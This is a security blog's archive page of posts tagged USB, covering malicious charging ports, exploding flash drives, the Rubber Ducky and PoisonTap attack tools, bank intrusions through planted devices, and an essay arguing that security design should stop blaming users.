Entries Tagged "USB"

Page 1 of 2

FBI Advising People to Avoid Public Charging Stations

The FBI is warning people against using public phone-charging stations, worrying that the combination power-data port can be used to inject malware onto the devices:

Avoid using free charging stations in airports, hotels, or shopping centers. Bad actors have figured out ways to use public USB ports to introduce malware and monitoring software onto devices that access these ports. Carry your own charger and USB cord and use an electrical outlet instead.

How much of a risk is this, really? I am unconvinced, although I do carry a USB condom for charging stations I find suspicious.

News article.

Posted on April 12, 2023 at 7:11 AMView Comments

Exploding USB Sticks

In case you don’t have enough to worry about, people are hiding explosives—actual ones—in USB sticks:

In the port city of Guayaquil, journalist Lenin Artieda of the Ecuavisa private TV station received an envelope containing a pen drive which exploded when he inserted it into a computer, his employer said.

Artieda sustained slight injuries to one hand and his face, said police official Xavier Chango. No one else was hurt.

Chango said the USB drive sent to Artieda could have been loaded with RDX, a military-type explosive.

More:

According to police official Xavier Chango, the flash drive that went off had a 5-volt explosive charge and is thought to have used RDX. Also known as T4, according to the Environmental Protection Agency (PDF), militaries, including the US’s, use RDX, which “can be used alone as a base charge for detonators or mixed with other explosives, such as TNT.” Chango said it comes in capsules measuring about 1 cm, but only half of it was activated in the drive that Artieda plugged in, which likely saved him some harm.

Reminds me of assassination by cell phone.

Posted on March 24, 2023 at 7:04 AMView Comments

USB “Rubber Ducky” Attack Tool

The USB Rubber Ducky is getting better and better.

Already, previous versions of the Rubber Ducky could carry out attacks like creating a fake Windows pop-up box to harvest a user’s login credentials or causing Chrome to send all saved passwords to an attacker’s webserver. But these attacks had to be carefully crafted for specific operating systems and software versions and lacked the flexibility to work across platforms.

The newest Rubber Ducky aims to overcome these limitations. It ships with a major upgrade to the DuckyScript programming language, which is used to create the commands that the Rubber Ducky will enter into a target machine. While previous versions were mostly limited to writing keystroke sequences, DuckyScript 3.0 is a feature-rich language, letting users write functions, store variables, and use logic flow controls (i.e., if this… then that).

That means, for example, the new Ducky can run a test to see if it’s plugged into a Windows or Mac machine and conditionally execute code appropriate to each one or disable itself if it has been connected to the wrong target. It also can generate pseudorandom numbers and use them to add variable delay between keystrokes for a more human effect.

Perhaps most impressively, it can steal data from a target machine by encoding it in binary format and transmitting it through the signals meant to tell a keyboard when the CapsLock or NumLock LEDs should light up. With this method, an attacker could plug it in for a few seconds, tell someone, “Sorry, I guess that USB drive is broken,” and take it back with all their passwords saved.

Posted on August 18, 2022 at 6:45 AMView Comments

Bogus Security Technology: An Anti-5G USB Stick

The 5GBioShield sells for £339.60, and the description sounds like snake oil:

…its website, which describes it as a USB key that “provides protection for your home and family, thanks to the wearable holographic nano-layer catalyser, which can be worn or placed near to a smartphone or any other electrical, radiation or EMF [electromagnetic field] emitting device”.

“Through a process of quantum oscillation, the 5GBioShield USB key balances and re-harmonises the disturbing frequencies arising from the electric fog induced by devices, such as laptops, cordless phones, wi-fi, tablets, et cetera,” it adds.

Turns out that it’s just a regular USB stick.

Posted on May 29, 2020 at 12:02 PMView Comments

Hey Secret Service: Don't Plug Suspect USB Sticks into Random Computers

I just noticed this bit from the incredibly weird story of the Chinese woman arrested at Mar-a-Lago:

Secret Service agent Samuel Ivanovich, who interviewed Zhang on the day of her arrest, testified at the hearing. He stated that when another agent put Zhang’s thumb drive into his computer, it immediately began to install files, a “very out-of-the-ordinary” event that he had never seen happen before during this kind of analysis. The agent had to immediately stop the analysis to halt any further corruption of his computer, Ivanovich testified. The analysis is ongoing but still inconclusive, he said.

This is what passes for forensics at the Secret Service? I expect better.

EDITED TO ADD (4/9): I know this post is peripherally related to Trump. I know some readers can’t help themselves from talking about broader issues surrounding Trump, Russia, and so on. Please do not comment to those posts. I will delete them as soon as I see them.

EDITED TO ADD (4/9): Ars Technica has more detail.

Posted on April 9, 2019 at 6:54 AMView Comments

Banks Attacked through Malicious Hardware Connected to the Local Network

Kaspersky is reporting on a series of bank hacks—called DarkVishnya—perpetrated through malicious hardware being surreptitiously installed into the target network:

In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company’s local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization’s building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals’ abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

Slashdot thread.

Posted on December 7, 2018 at 10:50 AMView Comments

Google Login Security for High-Risk Users

Google has a new login service for high-risk users. It’s good, but unforgiving.

Logging in from a desktop will require a special USB key, while accessing your data from a mobile device will similarly require a Bluetooth dongle. All non-Google services and apps will be exiled from reaching into your Gmail or Google Drive. Google’s malware scanners will use a more intensive process to quarantine and analyze incoming documents. And if you forget your password, or lose your hardware login keys, you’ll have to jump through more hoops than ever to regain access, the better to foil any intruders who would abuse that process to circumvent all of Google’s other safeguards.

It’s called Advanced Protection.

Posted on October 30, 2017 at 12:23 PMView Comments

Hacking Password-Protected Computers via the USB Port

PoisonTap is an impressive hacking tool that can compromise computers via the USB port, even when they are password-protected. What’s interesting is the chain of vulnerabilities the tool exploits. No individual vulnerability is a problem, but together they create a big problem.

Kamkar’s trick works by chaining together a long, complex series of seemingly innocuous software security oversights that only together add up to a full-blown threat. When PoisonTap—a tiny $5 Raspberry Pi microcomputer loaded with Kamkar’s code and attached to a USB adapter—is plugged into a computer’s USB drive, it starts impersonating a new ethernet connection. Even if the computer is already connected to Wifi, PoisonTap is programmed to tell the victim’s computer that any IP address accessed through that connection is actually on the computer’s local network rather than the internet, fooling the machine into prioritizing its network connection to PoisonTap over that of the Wifi network.

With that interception point established, the malicious USB device waits for any request from the user’s browser for new web content; if you leave your browser open when you walk away from your machine, chances are there’s at least one tab in your browser that’s still periodically loading new bits of HTTP data like ads or news updates. When PoisonTap sees that request, it spoofs a response and feeds your browser its own payload: a page that contains a collection of iframes—a technique for invisibly loading content from one website inside another­that consist of carefully crafted versions of virtually every popular website address on the internet. (Kamkar pulled his list from web-popularity ranking service Alexa‘s top one million sites.)

As it loads that long list of site addresses, PoisonTap tricks your browser into sharing any cookies it’s stored from visiting them, and writes all of that cookie data to a text file on the USB stick. Sites use cookies to check if a visitor has recently logged into the page, allowing visitors to avoid doing so repeatedly. So that list of cookies allows any hacker who walks away with the PoisonTap and its stored text file to access the user’s accounts on those sites.

There’s more. Here’s another article with more details. Also note that HTTPS is a protection.

Yesterday, I testified about this at a joint hearing of the Subcommittee on Communications and Technology, and the Subcommittee on Commerce, Manufacturing, and Trade—both part of the Committee on Energy and Commerce of the US House of Representatives. Here’s the video; my testimony starts around 1:10:10.

The topic was the Dyn attacks and the Internet of Things. I talked about different market failures that will affect security on the Internet of Things. One of them was this problem of emergent vulnerabilities. I worry that as we continue to connect things to the Internet, we’re going to be seeing a lot of these sorts of attacks: chains of tiny vulnerabilities that combine into a massive security risk. It’ll be hard to defend against these types of attacks. If no one product or process is to blame, no one has responsibility to fix the problem. So I gave a mostly Republican audience a pro-regulation message. They were surprisingly polite and receptive.

Posted on November 17, 2016 at 8:22 AMView Comments

Security Design: Stop Trying to Fix the User

Every few years, a researcher replicates a security study by littering USB sticks around an organization’s grounds and waiting to see how many people pick them up and plug them in, causing the autorun function to install innocuous malware on their computers. These studies are great for making security professionals feel superior. The researchers get to demonstrate their security expertise and use the results as “teachable moments” for others. “If only everyone was more security aware and had more security training,” they say, “the Internet would be a much safer place.”

Enough of that. The problem isn’t the users: it’s that we’ve designed our computer systems’ security so badly that we demand the user do all of these counterintuitive things. Why can’t users choose easy-to-remember passwords? Why can’t they click on links in emails with wild abandon? Why can’t they plug a USB stick into a computer without facing a myriad of viruses? Why are we trying to fix the user instead of solving the underlying security problem?

Traditionally, we’ve thought about security and usability as a trade-off: a more secure system is less functional and more annoying, and a more capable, flexible, and powerful system is less secure. This “either/or” thinking results in systems that are neither usable nor secure.

Our industry is littered with examples. First: security warnings. Despite researchers’ good intentions, these warnings just inure people to them. I’ve read dozens of studies about how to get people to pay attention to security warnings. We can tweak their wording, highlight them in red, and jiggle them on the screen, but nothing works because users know the warnings are invariably meaningless. They don’t see “the certificate has expired; are you sure you want to go to this webpage?” They see, “I’m an annoying message preventing you from reading a webpage. Click here to get rid of me.”

Next: passwords. It makes no sense to force users to generate passwords for websites they only log in to once or twice a year. Users realize this: they store those passwords in their browsers, or they never even bother trying to remember them, using the “I forgot my password” link as a way to bypass the system completely—­effectively falling back on the security of their e-mail account.

And finally: phishing links. Users are free to click around the Web until they encounter a link to a phishing website. Then everyone wants to know how to train the user not to click on suspicious links. But you can’t train users not to click on links when you’ve spent the past two decades teaching them that links are there to be clicked.

We must stop trying to fix the user to achieve security. We’ll never get there, and research toward those goals just obscures the real problems. Usable security does not mean “getting people to do what we want.” It means creating security that works, given (or despite) what people do. It means security solutions that deliver on users’ security goals without­—as the 19th-century Dutch cryptographer Auguste Kerckhoffs aptly put it­—”stress of mind, or knowledge of a long series of rules.”

I’ve been saying this for years. Security usability guru (and one of the guest editors of this issue) M. Angela Sasse has been saying it even longer. People—­and developers—­are finally starting to listen. Many security updates happen automatically so users don’t have to remember to manually update their systems. Opening a Word or Excel document inside Google Docs isolates it from the user’s system so they don’t have to worry about embedded malware. And programs can run in sandboxes that don’t compromise the entire computer. We’ve come a long way, but we have a lot further to go.

“Blame the victim” thinking is older than the Internet, of course. But that doesn’t make it right. We owe it to our users to make the Information Age a safe place for everyone—­not just those with “security awareness.”

This essay previously appeared in the Sep/Oct issue of IEEE Security & Privacy.

EDITED TO ADD (10/13): Commentary.

Posted on October 3, 2016 at 6:12 AMView Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.